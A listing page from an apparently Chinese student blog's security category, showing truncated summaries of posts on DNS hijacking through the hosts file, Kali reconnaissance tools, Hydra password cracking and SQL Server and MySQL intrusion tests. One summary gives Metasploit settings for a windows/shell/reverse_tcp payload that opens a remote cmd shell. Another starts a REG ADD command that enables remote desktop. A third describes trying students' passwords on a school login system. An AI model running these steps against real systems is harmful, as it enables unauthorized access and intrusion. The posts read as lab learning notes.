随笔分类 -  安全

安全
摘要:劫持演示 如果要进行DNS劫持的话,需要在被劫持电脑上有apache或者Nginx服务,或者劫持人有一台服务器之类的。相信大家了解DNS,这里就不多说了。直接上图:在C:\Windows\System32\drivers\etc下找到hosts文件,将其拖到桌面上进行操作。说明一下,里面的 127.0.0.1 那些是我以前为了用PS等Adobe软件弄的。接下来进行DNS劫持操作:在最后添加127.0.0.1 www.baidu.com然后托回到原来的地方。因为我电脑上装得有apache,可以直接看到效果。用得360极速浏览器,可以看到效果。再来张图看看情况。同理,将127.0.0.1换为其.. 阅读全文
posted @ 2014-03-03 12:53 我爱物联网 阅读(2912) 评论(17) 推荐(1) 编辑
摘要:注入漏洞代码和分析 先上代码Error number: [$errno],error on line $errline in $errfile"; die(); } set_error_handler("customError",E_ERROR); $getfilter="'|(and|or)\\b.+?(>|||操作IP: ".$_SERVER["REMOTE_ADDR"]."操作时间: ".strftime("%Y-%m-%d %H:%M:%S")... 阅读全文
posted @ 2014-01-11 18:50 我爱物联网 阅读(6169) 评论(1) 推荐(0) 编辑
摘要:背景 Ms06040(Server服务中的缓冲区溢出漏洞)是继ms06035以后的又一个重大漏洞,利用此漏洞的魔波蠕虫已经开始蔓延,相信互连网又会因此掀起血雨腥风。 此漏洞的影响范围有多大? 这是一个远程执行代码漏洞。 成功利用此漏洞的攻击者可以远程完全控制受影响的系统。 攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 造成漏洞的原因是什么? Server 服务中未经检查的缓冲区。 什么是... 阅读全文
posted @ 2014-01-11 17:47 我爱物联网 阅读(1346) 评论(0) 推荐(0) 编辑
摘要:ASPack按步就班不能让程序往上跳,否则会进入壳的循环。一直走(F8),走到一个大跳转的时候,那个很有可能就是程序的入口。ESP寄存器当八个寄存器没有变化是ESP地址变化,将找到对应的地址下断点,然而运行,运行附近的代码找到大跳转进入程序入口进行脱壳。PECompact2按F7跟随7C92E493... 阅读全文
posted @ 2013-12-28 14:19 我爱物联网 阅读(1931) 评论(11) 推荐(4) 编辑
摘要:坦白讲,我是个小白,也就是各大黑客和安全厂商所说的目标群体,前者是攻击我,后者有可能保护我。但是无论如何,这次后者应该也很无能为力了——我遭遇到了传说中的Arp攻击。 在连续一周的时间里,我发现我无法上网。而在这一周的时间里,我做过各种尝试:我换过杀毒软件,重装过系统,甚至安装了Win7+Linux的双系统来使用,但是直到昨天晚上,我才猛然想起还有Arp这种攻击方式。 好吧,我承认我运气不好。 我做了很简单的防御,我安装了一款N年前的金山Arp防火墙——我原本是360的忠实用户,但是不知道为什么最新的360版本当中没有找到。装上Arp防火墙以后,立马弹出窗口提示说早到Arp攻击。我本... 阅读全文
posted @ 2013-12-26 20:51 我爱物联网 阅读(983) 评论(0) 推荐(0) 编辑
摘要:网络漏洞攻击工具Metasploit 先msfupdate升级: 然后选择msfconsole: 接下来:set LHOST 本机IP地址setLPORT 4445setg PAYLOAD windows/shell/reverse_tcpsetg RHOST 目标IP地址setg port 21set target 随意数字exploit这样就可以反弹一个cmd shell了。密码破解Hydra多samba,smb,ssh,smtp,telnet,mysql,ftp,vnc,icq,socks5,pcnfs,cisco等各类主流服务进行在线密码破解攻击尝试攻击。字典破解,Protoco... 阅读全文
posted @ 2013-12-25 20:00 我爱物联网 阅读(1498) 评论(2) 推荐(1) 编辑
摘要:Web踩点CMS程序版本探测Blindelephant针对WORDPRESS程序的踩点工具,通过比较插件等一系列的指纹,判断版本。格式:Python Blindelephant.py [参数] url appname表示很蛋疼,什么情况。WhatwebWeb应用程序探测工具。初次使用会提示在终端执行:Update-alternatives –config ruby格式:./whatweb [参数] WAF防火墙探测WaffitWAF防火墙检测工具,作用于探测WEB服务器是否运行了WAF防火墙。格式:./wafw00f.py url1 [url2 [url3 …]]没有WAF防火墙。Web网络爬 阅读全文
posted @ 2013-12-24 19:15 我爱物联网 阅读(1556) 评论(0) 推荐(0) 编辑
摘要:操作系统探测Xprobe2通过ICMP协议来获得指纹,通过模糊矩阵统计分析主动探测数据包对应的ICMP数据特征,进而探测得到远端操作系统的类型。格式:./xprobe2 域名./xprobe2 –v –r IP-v详细-r 显示目标(traceroute)端口服务软件探测Amap用于操作系统判断、端口对应服务版本判断。Application Mapping 模式:amap –A 域名 portBanner模式:amap –B 域名 port -P 检测端口是否开启Dmirty能够最大限度收集一个IP或者域名尽量可能多的信息,它具有子域名查找、whois查询、email地址搜索、信息更新查询,t 阅读全文
posted @ 2013-12-23 22:30 我爱物联网 阅读(1641) 评论(0) 推荐(0) 编辑
摘要:DNS记录探测dnsenum 针对NDS信息收集的工具格式:./dnsenum.pl dbsserver (域名) 请原谅我拿freestu.net这个学校团委的域名做的测试,求不黑!!dnsmap DNS类枚举工具,域名暴力破解工具,若是大型网站则比较费时。格式:./dnsmap [参数]-r 表示将破解结果保存至/tmp/目录Dnsrecon 通过GOOGLE查处站点的子域名和IP信息格式:./dnsrecon.py [参数]-d 是指定域名--lifetime 是指定相应时间30sNS是dns.com.cn的,域名也就是那申请的。MX是腾讯的企业邮箱。全暴露了!!!!!!!查... 阅读全文
posted @ 2013-12-22 15:42 我爱物联网 阅读(1463) 评论(0) 推荐(0) 编辑
摘要:告诉大家一个坏消息,还是有刷票的行为,有图有真相:倒数第三项是时间轴,倒数第二项是IP,倒数第一项是邮箱,你们要刷票,拦都拦不住呀呀呀呀呀呀!!!!!看看这些时间的间隔,看看这些IP的地址,哎,再看看邮箱,全163的,再也不爱了。 再来看看这些软件,有图有真相:还有神马人工输入验证码的,自动输入验证码的,哎,被秒杀了瞬间。。。。 继上篇刷票风云的随笔之后,我还是决定用每个学生登录教务处的密码尝试一下,虽然这个我在开学的时候做微信开发的时候弄过。 首先要做的是登录学校教务处网站,然后打开sharkwire,取得传过去的信息,这些图我就明天上传补上,现在是用的同学电脑。 获取到传过去的... 阅读全文
posted @ 2013-12-12 23:37 我爱物联网 阅读(2881) 评论(5) 推荐(1) 编辑
摘要:最近学校导航站找我让我给他们做一个投票系统的网站,我一口答应了,他们只是要求不准刷票情况出现,我也一口答应了。。我答应的太干脆了。 然后我便开始做这个网站,网站做出来没花太多时间,并且我是用IP来判断是否投过票,现在想起来,IP,唉,,,痛啊啊啊啊啊。 投票的前一天,我给导航站的看网站,他们觉得可以,并且希望只能用学校内网投票,然后又改,还好服务器是在学校里面的,内网的IP可以直接访问的,在IP处理这一方面直接用的是正则表达式,只允许172.16.0.0到172.32.255.255的IP投票,然后我天真的以为这样就可以防止刷票了。 投票的第一天,很多队伍都很为内网投票很头疼,我告诉... 阅读全文
posted @ 2013-12-11 21:12 我爱物联网 阅读(3841) 评论(58) 推荐(1) 编辑
摘要:扫描工具RangeScan 查找Unicode漏洞U-SCAN 扫描端口,弱口令WebDAVScan 扫描系统中是否存在WebDAV漏洞SuperScan 功能强大的端口扫描工具。 1)通过Ping来检验IP是否在线; 2)IP和域名相互转换; 3)检验目标计算机提供的服务类别; 4)检验一定范围目标计算机的是否在线和端口情况; 5)工具自定义列表检验目标计算机是否在线和端口情况; 6)自定义要检验的端口,并可以保存为端口列表文件; 7)软件自带一个木马端口列表trojans.lst,通... 阅读全文
posted @ 2013-12-10 08:47 我爱物联网 阅读(1138) 评论(2) 推荐(0) 编辑
摘要:在GRUB中设置密码vi /etc/grub.conf增加:password = 654321或者:password --md5 (MD5值)使用yyd用户能以root用户执行所有命令vi /etc/sidoersyyd ALL=(ALL)ALLLinux自带MD5加密/sbin/grub-md5-crypt限制su命令的滥用使用PAM可以对切换到超级用户的限制,PAM可以禁止除在wheel组以外的任何人使用su命令转换成rootvi /etc/pam.d/su去掉这两行左边的注释符“#”:#auth sufficient /libsecurity/$ISA/pam_wheel.so tr.. 阅读全文
posted @ 2013-12-09 21:50 我爱物联网 阅读(1408) 评论(0) 推荐(1) 编辑
摘要:在做了之前的SQL SERVER之后,便很想尝试一下MYSQL的入侵测试已经防范,与大家一起分享。总的来说,我一直在用的是MYSQL,对MYSQL比较熟悉,相比较而言,感觉MYSQL更安全,这只是我自己胡乱猜想的,希望不要引起什么争论神马的。。。一本馒头引发的血案。。。正题之一物理机:Win7虚拟机:XP给予mysql远程权限:1 grant all privileges on *.* to 数据库账号@给予权限的IP identified by '数据库密码';2 3 flush privileges;给物理机远程权限:物理机成功连接上:执行侵入测试前(有图有真相):执行侵入 阅读全文
posted @ 2013-12-09 15:06 我爱物联网 阅读(1904) 评论(7) 推荐(2) 编辑
摘要:我之所以要做这样的测试是因为这一切都是有背景的!!!被黑客黑的代价!!!伤心ing。。。。。背景:测试:物理机:Win7虚拟机:xp扫描工具(我想我最好不写扫描器的名字比较好):密码之所以是123456是因为前一阵子做SQL SERVER的分布式数据库的实验,然后就把密码弄得很简单。物理机上似乎好像感觉有很多漏洞呀呀呀呀呀呀呀。表示很蛋疼获取到了SQL SERER 的sa帐号的密码,用某软件(我想我最好不写软件的名字比较好)进行连接:这个软件功能真心强大!!360报警了:360,你为何如此的屌!!!!!!!!!!!允许执行后的效果:防范:心得:我这学期在上信息安全导论这门课,老师让我们做了许多 阅读全文
posted @ 2013-12-08 14:29 我爱物联网 阅读(1874) 评论(12) 推荐(0) 编辑
摘要:物理机系统:Win7虚拟机系统:Win2003Netstat –an 查看本机端口Netstat –ano 查看本机端口+PID通过本机上操作(比如登录网站),然后命令,查看对方IP以及端口首先使用360极速浏览器插件查看本机ip本机IPv6地址(临时),感觉很屌!!!!网页访问百度之后百度IPNetstat –ano查看内部地址转外部地址出现问题:本地地址访问的百度是172.19.166.5,但是没有172.19.166.5与外部地址的转换,初步怀疑是IPv6,但是百度ip显示的是很是疑惑。查看是哪个进程 ---- Tasklist正题之一命令行开启3389端口REG ADD HKLM\.. 阅读全文
posted @ 2013-12-07 14:59 我爱物联网 阅读(1589) 评论(0) 推荐(1) 编辑

AmazingCounters.com